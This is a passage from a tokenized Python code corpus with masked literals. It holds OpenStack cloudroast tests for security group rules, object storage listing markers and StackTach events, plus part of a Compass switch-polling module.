<EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative = DatasetList ( ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:255> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , "<STR_LIT>" : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data_set_list_negative . append_new_dataset ( <EOL> name = '<STR_LIT>' , <EOL> data_dict = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> tags = [ '<STR_LIT>' ] ) <EOL> @ DataDrivenFixture <EOL> class SecurityGroupRuleCreateTest ( NetworkingSecurityGroupsFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> """<STR_LIT>""" <EOL> super ( SecurityGroupRuleCreateTest , cls ) . setUpClass ( ) <EOL> cls . expected_secgroup = cls . get_expected_secgroup_data ( ) <EOL> cls . expected_secgroup . name = '<STR_LIT>' <EOL> cls . expected_secgroup . description = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . secgroup = self . create_test_secgroup ( self . expected_secgroup ) <EOL> self . expected_secrule = self . get_expected_secrule_data ( ) <EOL> self . expected_secrule . security_group_id = self . secgroup . id <EOL> def tearDown ( self ) : <EOL> self . secGroupCleanUp ( ) <EOL> @ data_driven_test ( data_set_list ) <EOL> def ddtest_security_group_rule_create ( self , <EOL> security_group_id = None , <EOL> direction = None , <EOL> ethertype = None , <EOL> port_range_min = None , <EOL> port_range_max = None , <EOL> protocol = None , <EOL> remote_group_id = None , <EOL> remote_ip_prefix = None , <EOL> use_false_values = False ) : <EOL> """<STR_LIT>""" <EOL> expected_secrule = self . expected_secrule <EOL> request_kwargs = dict ( <EOL> security_group_id = expected_secrule . security_group_id ) <EOL> properties = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for prop_name in properties : <EOL> prop_value = eval ( prop_name ) <EOL> if prop_value is not None : <EOL> request_kwargs [ prop_name ] = prop_value <EOL> setattr ( expected_secrule , prop_name , prop_value ) <EOL> if protocol is not None : <EOL> request_kwargs [ '<STR_LIT>' ] = protocol <EOL> expected_secrule . protocol = protocol . upper ( ) <EOL> if remote_group_id is not None : <EOL> if remote_group_id == True : <EOL> remote_group_id = expected_secrule . security_group_id <EOL> request_kwargs [ '<STR_LIT>' ] = remote_group_id <EOL> expected_secrule . remote_group_id = remote_group_id <EOL> resp = self . sec . behaviors . create_security_group_rule ( ** request_kwargs ) <EOL> if resp . response . entity and hasattr ( resp . response . entity , '<STR_LIT:id>' ) : <EOL> self . delete_secgroups_rules . append ( resp . response . entity . id ) <EOL> self . assertFalse ( resp . failures ) <EOL> secrule = resp . response . entity <EOL> self . assertSecurityGroupRuleResponse ( expected_secrule , secrule ) <EOL> @ data_driven_test ( data_set_list_negative ) <EOL> def ddtest_security_group_rule_create_negative ( self , <EOL> security_group_id = None , <EOL> direction = None , <EOL> ethertype = None , <EOL> port_range_min = None , <EOL> port_range_max = None , <EOL> protocol = None , <EOL> remote_group_id = None , <EOL> remote_ip_prefix = None , <EOL> use_false_values = False , <EOL> http_status = None , <EOL> test_desc = None , <EOL> error_type = None ) : <EOL> """<STR_LIT>""" <EOL> expected_secrule_data = self . expected_secrule <EOL> request_kwargs = dict ( <EOL> security_group_id = expected_secrule_data . security_group_id , <EOL> raise_exception = False ) <EOL> properties = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for prop_name in properties : <EOL> prop_value = eval ( prop_name ) <EOL> if prop_value is not None : <EOL> request_kwargs [ prop_name ] = prop_value <EOL> if use_false_values : <EOL> request_kwargs [ '<STR_LIT>' ] = protocol <EOL> resp = self . sec . behaviors . create_security_group_rule ( ** request_kwargs ) <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( test_description = test_desc ) <EOL> status_code = getattr ( SecurityGroupsResponseCodes , http_status ) <EOL> if error_type : <EOL> error_type = getattr ( SecurityGroupsErrorTypes , error_type ) <EOL> self . assertNegativeResponse ( <EOL> resp = resp , status_code = status_code , msg = msg , <EOL> delete_list = self . delete_secgroups_rules , <EOL> error_type = error_type ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from cloudcafe . objectstorage . objectstorage_api . common . constants import Constants <EOL> from cloudroast . objectstorage . fixtures import ObjectStorageFixture <EOL> CONTENT_TYPE_TEXT = '<STR_LIT>' <EOL> CONTAINER_NAME = '<STR_LIT>' <EOL> class MarkerEndMarkerTest ( ObjectStorageFixture ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> super ( MarkerEndMarkerTest , cls ) . setUpClass ( ) <EOL> cls . container_name = CONTAINER_NAME <EOL> cls . client . create_container ( cls . container_name ) <EOL> object_data = Constants . VALID_OBJECT_DATA <EOL> content_length = str ( len ( object_data ) ) <EOL> headers = { '<STR_LIT>' : content_length , <EOL> '<STR_LIT:Content-Type>' : CONTENT_TYPE_TEXT } <EOL> cls . obj_names = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> for obj_name in cls . obj_names : <EOL> cls . client . create_object ( <EOL> cls . container_name , <EOL> obj_name , <EOL> headers = headers , <EOL> data = object_data ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> super ( MarkerEndMarkerTest , cls ) . setUpClass ( ) <EOL> cls . behaviors . force_delete_containers ( [ cls . container_name ] ) <EOL> def test_marker ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:c>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:5> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_marker_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_swapped_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_end_marker ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:d>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_end_marker_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_end_marker_swapped_uppper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_marker_end_marker ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:b>" , "<STR_LIT>" : "<STR_LIT:e>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:3> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( '<STR_LIT>' , members , msg = "<STR_LIT>" ) <EOL> def test_marker_end_marker_lower_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_end_marker_swapped_upper_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_marker_limit ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:b>" , "<STR_LIT>" : "<STR_LIT:2>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_marker_limit_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_limit_swapped_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_end_marker_limit ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:e>" , "<STR_LIT>" : "<STR_LIT:2>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_end_marker_limit_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_end_marker_limit_swapped_upper_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> def test_marker_end_marker_limit ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:b>" , <EOL> "<STR_LIT>" : "<STR_LIT:e>" , <EOL> "<STR_LIT>" : "<STR_LIT:2>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:2> <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , members , msg = "<STR_LIT>" ) <EOL> def test_marker_end_marker_limit_upper_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:a>" , <EOL> "<STR_LIT>" : "<STR_LIT:h>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> members = [ ] <EOL> for member in content : <EOL> if '<STR_LIT:name>' in member : <EOL> members . append ( member [ '<STR_LIT:name>' ] ) <EOL> else : <EOL> continue <EOL> self . assertTrue ( response . ok ) <EOL> expected = len ( self . obj_names ) <EOL> recieved = len ( members ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) <EOL> self . assertEqual ( <EOL> members , <EOL> self . obj_names , <EOL> msg = "<STR_LIT>" . format ( members , self . obj_names ) ) <EOL> def test_marker_end_marker_limit_swapped_upper_lower_bound ( self ) : <EOL> params = { "<STR_LIT>" : "<STR_LIT:h>" , <EOL> "<STR_LIT>" : "<STR_LIT:a>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> response = self . client . list_objects ( self . container_name , params = params ) <EOL> content = None <EOL> try : <EOL> content = json . loads ( response . content ) <EOL> except ValueError , error : <EOL> self . fixture_log . exception ( error ) <EOL> self . assertTrue ( response . ok ) <EOL> expected = <NUM_LIT:0> <EOL> recieved = len ( content ) <EOL> self . assertEqual ( <EOL> expected , <EOL> recieved , <EOL> msg = "<STR_LIT>" . format ( <EOL> expected , <EOL> recieved ) ) </s>
<s> """<STR_LIT>""" <EOL> from cloudroast . stacktach . fixtures import StackTachComputeIntegration , StackTachTestAssertionsFixture <EOL> class StackTachDBChangePasswordServerTests ( StackTachComputeIntegration , <EOL> StackTachTestAssertionsFixture ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . create_server ( ) <EOL> cls . change_password_server ( ) <EOL> cls . stacktach_events_for_server ( server = cls . changed_password_server ) <EOL> def test_launch_entry_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_attributes_in_launch_response ( ) <EOL> def test_launch_entry_fields_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_launch_entry_field_values ( <EOL> server = self . changed_password_server ) <EOL> def test_no_delete_entry_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_no_deletes_entry_returned ( ) <EOL> def test_no_exist_entry_on_change_password_server_response ( self ) : <EOL> """<STR_LIT>""" <EOL> self . validate_no_exists_entry_returned ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> current_dir = os . path . dirname ( os . path . realpath ( __file__ ) ) <EOL> sys . path . append ( current_dir ) <EOL> import switch_virtualenv <EOL> from compass . utils import flags <EOL> from compass . utils import logsetting <EOL> from compass . utils import setting_wrapper as setting <EOL> flags . init ( ) <EOL> flags . OPTIONS . logfile = setting . WEB_LOGFILE <EOL> logsetting . init ( ) <EOL> from compass . api import api as compass_api <EOL> compass_api . init ( ) <EOL> application = compass_api . app </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import netaddr <EOL> from compass . actions import util <EOL> from compass . db . api import database <EOL> from compass . db . api import switch as switch_api <EOL> from compass . db . api import user as user_api <EOL> from compass . hdsdiscovery . hdmanager import HDManager <EOL> def _poll_switch ( ip_addr , credentials , req_obj = '<STR_LIT>' , oper = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> under_monitoring = '<STR_LIT>' <EOL> unreachable = '<STR_LIT>' <EOL> polling_error = '<STR_LIT:error>' <EOL> hdmanager = HDManager ( ) <EOL> vendor , state , err_msg = hdmanager . get_vendor ( ip_addr , credentials ) <EOL> if not vendor : <EOL> logging . info ( "<STR_LIT>" , err_msg ) <EOL> logging . error ( '<STR_LIT>' , ip_addr ) <EOL> return ( <EOL> { <EOL> '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg <EOL> } , { <EOL> } <EOL> ) <EOL> logging . debug ( <EOL> '<STR_LIT>' , ip_addr <EOL> ) <EOL> results = [ ] <EOL> try : <EOL> results = hdmanager . learn ( <EOL> ip_addr , credentials , vendor , req_obj , oper <EOL> ) <EOL> except Exception as error : <EOL> logging . exception ( error ) <EOL> state = unreachable <EOL> err_msg = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> return ( <EOL> { <EOL> '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg <EOL> } , { <EOL> } <EOL> ) <EOL> logging . info ( "<STR_LIT>" , ip_addr , results ) <EOL> if not results : <EOL> logging . error ( <EOL> '<STR_LIT>' , ip_addr <EOL> ) <EOL> state = polling_error <EOL> err_msg = '<STR_LIT>' <EOL> return ( <EOL> { '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg } , <EOL> { } <EOL> ) <EOL> logging . info ( '<STR_LIT>' % str ( results ) ) <EOL> machine_dicts = { } <EOL> for machine in results : <EOL> mac = machine [ '<STR_LIT>' ] <EOL> port = machine [ '<STR_LIT:port>' ] <EOL> vlan = int ( machine [ '<STR_LIT>' ] ) <EOL> if vlan : <EOL> vlans = [ 